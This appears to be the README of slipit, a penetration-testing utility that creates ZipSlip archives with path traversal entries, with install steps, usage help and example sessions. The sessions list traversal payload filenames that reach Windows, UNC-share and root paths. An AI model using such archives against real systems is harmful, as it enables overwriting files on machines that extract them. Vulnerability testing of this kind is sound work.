slipit
slipit is a command line utility for creating archives with path traversal elements. It is basically a successor of the famous evilarc utility with an extended feature set and improved base functionality.
Installation
slipit can be installed via pip by running the following commands:
$ git clone https://github.com/usdAG/slipit
$ cd slipit
$ python3 setup.py sdist
$ pip3 install --user sdist/*
slipit also supports autocompletion for bash. To take advantage of autocompletion, you need to have the completion-helpers project installed. If setup correctly, just copying the completion script to your ~/.bash_completion.d folder enables autocompletion.
Usage
[[email protected] ~]$ slipit -h
usage: slipit [-h] [--archive-type {zip,tar,tgz,bz2}] [--clear] [--debug] [--depth int] [--increment int] [--overwrite]
[--prefix string] [--multi] [--separator char] [--sequence seq] [--static content] [input ...] archive
slipit v1.0.0 - Utility for creating ZipSlip archives.
positional arguments:
input input files to include into the archive
archive target archive file
optional arguments:
-h, --help show this help message and exit
--archive-type {zip,tar,tgz,bz2}
archive type to use
--clear clear the specified archive from traversal items
--debug enable verbose error output
--depth int number of traversal sequences to use (default=6)
--increment int add incremental traversal payloads from
to depth
--overwrite overwrite the target archive instead of appending to it
--prefix string prefix to use before the file name
--multi create an archive containing multiple payloads
--separator char path separator (default=\)
--sequence seq use a custom traversal sequence (default=..{sep})
--static content use static content for each input file
slipit expects an arbitrary number of input files and the targeted output archive as mandatory command line parameters. All specified input files are appended to the specified archive including a path traversal prefix with a depth specified with the --depth option (default is 6). The targeted archive format is determined automatically depending on the file extension for non existing archives or the mime type for already existing archives. You can also specify the archive type manually by using the --archive-type option.
[[email protected] ~]$ slipit example.zip
File Name Modified Size
example/ 2022-02-02 18:39:00 0
example/images/ 2022-02-02 18:40:16 0
example/images/holiday.png 2022-02-02 18:40:06 34001
example/images/beach.png 2022-02-02 18:40:16 2112
example/documents/ 2022-02-02 18:39:48 0
example/documents/invoice.docx 2022-02-02 18:39:40 3001
example/documents/important.docx 2022-02-02 18:39:48 121
[[email protected] ~]$ slipit test.txt example.zip
[[email protected] ~]$ slipit example.zip
File Name Modified Size
example/ 2022-02-02 18:39:00 0
example/images/ 2022-02-02 18:40:16 0
example/images/holiday.png 2022-02-02 18:40:06 34001
example/images/beach.png 2022-02-02 18:40:16 2112
example/documents/ 2022-02-02 18:39:48 0
example/documents/invoice.docx 2022-02-02 18:39:40 3001
example/documents/important.docx 2022-02-02 18:39:48 121
..\..\..\..\..\..\test.txt 2022-02-02 18:40:48 36
slipit expects the specified input files to exist on your local file system and uses the file content of them within the archive. Often times this is not necessary and you just require dummy content to test for ZipSlip vulnerabilities. This is where the --static
option can be helpful. When using this option, only the filenames of the specified input files are used within the archive, while their content is set to
.
[[email protected] ~]$ slipit test2.txt example.zip --static 'HELLO WORLD :D'
[[email protected] ~]$ slipit example.zip
File Name Modified Size
example/ 2022-02-02 18:39:00 0
example/images/ 2022-02-02 18:40:16 0
example/images/holiday.png 2022-02-02 18:40:06 34001
example/images/beach.png 2022-02-02 18:40:16 2112
example/documents/ 2022-02-02 18:39:48 0
example/documents/invoice.docx 2022-02-02 18:39:40 3001
example/documents/important.docx 2022-02-02 18:39:48 121
..\..\..\..\..\..\test.txt 2022-02-02 18:40:48 36
..\..\..\..\..\..\test2.txt 2022-02-02 18:45:22 14
By using the --clear option, you can clear an archive from path traversal payloads.
[[email protected] ~]$ slipit --clear example.zip
[[email protected] ~]$ slipit example.zip
File Name Modified Size
example/ 2022-02-02 18:39:00 0
example/images/ 2022-02-02 18:40:16 0
example/images/holiday.png 2022-02-02 18:40:06 34001
example/images/beach.png 2022-02-02 18:40:16 2112
example/documents/ 2022-02-02 18:39:48 0
example/documents/invoice.docx 2022-02-02 18:39:40 3001
example/documents/important.docx 2022-02-02 18:39:48 121
slipit also allows to create an archive containing multiple payloads by using the --multi option:
[[email protected] ~]$ slipit test.txt example.zip --static content --multi
[[email protected] ~]$ slipit example.zip
File Name Modified Size
C:\Windows\test.txt 2022-02-03 09:35:28 7
\\10.10.10.1\share\test.txt 2022-02-03 09:35:28 7
/root/test.txt 2022-02-03 09:35:28 7
../test.txt 2022-02-03 09:35:28 7
..\test.txt 2022-02-03 09:35:28 7
../../test.txt 2022-02-03 09:35:28 7
..\..\test.txt 2022-02-03 09:35:28 7
../../../test.txt 2022-02-03 09:35:28 7
..\..\..\test.txt 2022-02-03 09:35:28 7
../../../../test.txt 2022-02-03 09:35:28 7
..\..\..\..\test.txt 2022-02-03 09:35:28 7
../../../../../test.txt 2022-02-03 09:35:28 7
..\..\..\..\..\test.txt 2022-02-03 09:35:28 7
Supported Archive Types
Currently, the following archive types are supported (just naming their most common extension):
.zip.tar.tar.gz.tar.bz2
20 Dec 21, 2022
4 Dec 9, 2022
14 Oct 24, 2022
2 Dec 8, 2021
4 Oct 16, 2022
1 Sep 11, 2022
3 May 24, 2022
1 Feb 3, 2022
14.5k Jan 3, 2023
![[Bug] Unexcepted exception occured.](https://avatars.githubusercontent.com/u/29393958?v=4)
1 Nov 23, 2021
21 Mar 25, 2022
808 Jan 04, 2023
7 Sep 14, 2022
12 Mar 25, 2022
6 Jan 03, 2023
5 Jan 30, 2022
5 Nov 17, 2021
2 Sep 21, 2022
1 Dec 07, 2021
570 Dec 29, 2022
23 Jun 10, 2022
1 Aug 21, 2022
29 Dec 06, 2022
8 May 06, 2022
13 Oct 14, 2022
2 Oct 24, 2021
58 Dec 06, 2022
1 Oct 30, 2021
1 Jan 13, 2022